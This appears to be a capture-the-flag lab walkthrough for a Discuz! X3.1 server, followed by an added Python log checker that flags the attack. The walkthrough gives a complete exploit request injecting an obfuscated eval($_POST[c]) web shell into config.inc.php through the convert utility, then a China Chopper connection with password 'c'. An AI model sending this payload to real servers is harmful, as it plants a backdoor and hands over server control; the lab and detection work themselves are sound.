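Lab environment: Windows XP
Tools: Burp Suite, caidao (China Chopper)
Goal: gain server-level access to www.test.ichunqiu
Start the lab and open the website; it is running Discuz! (dz). Searching online for vulnerabilities that match the dz version turns up one for dz X3.1.
Next, open www.test.ichunqiu/utility/convert and configure the network proxy.
Then capture the request with Burp and send the EXP directly: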
POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1
Host: www.test.ichunqiu
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 199
Content-Type: application/x-www-form-urlencoded

newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
Then connect with caidao to www.test.ichunqiu/utility/convert/data/config.inc.php, using the password c.
Retrieve the flag.
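
Added example, not part of the original walkthrough: a Python check a defender could run over proxy or WAF logs to flag the request shown above, by looking for line breaks and code tokens inside a newconfig[] key and decoding the CHR() chain. It assumes the method, request target and raw body are logged; the function names and the sample constants are made up for this illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: request target and body copied from the walkthrough above.
SAMPLE_TARGET = "/utility/convert/index.php?a=config&source=d7.2_x2.0"
SAMPLE_BODY = (
    "newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40)"
    ".CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91)"
    ".CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes"
)

# Two or more CHR(n) calls joined with PHP's "." concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))+", re.I)
CODE_TOKEN = re.compile(
    r"\b(?:eval|assert|system|passthru|exec)\s*\(|\$_(?:POST|GET|REQUEST)", re.I)


def decode_chr_chains(text):
    """Return the string each CHR(n).CHR(m)... run would build in PHP."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
            for m in CHR_CHAIN.finditer(text)]


def inspect_config_write(method, target, body):
    """Return findings for a POST to the convert tool; empty list if clean."""
    if method != "POST" or not urlsplit(target).path.startswith("/utility/convert/"):
        return []
    findings = []
    for pair in body.split("&"):  # split by hand: the key may contain ';'
        key = unquote_plus(pair.partition("=")[0])
        if not key.startswith("newconfig["):
            continue
        # A line break in a key is never legitimate for a config field name.
        if "\r" in key or "\n" in key:
            findings.append("line break inside newconfig[] key")
        decoded = decode_chr_chains(key)
        for text in decoded:
            findings.append("CHR() chain decodes to: " + text)
        if any(CODE_TOKEN.search(t) for t in [key] + decoded):
            findings.append("PHP code token in newconfig[] key")
    return findings


if __name__ == "__main__":
    for finding in inspect_config_write("POST", SAMPLE_TARGET, SAMPLE_BODY):
        print(finding)
```

Any finding on a request to /utility/convert/ is worth an alert on its own, and the same review should check whether the convert utility is still reachable on the server and whether data/config.inc.php has changed.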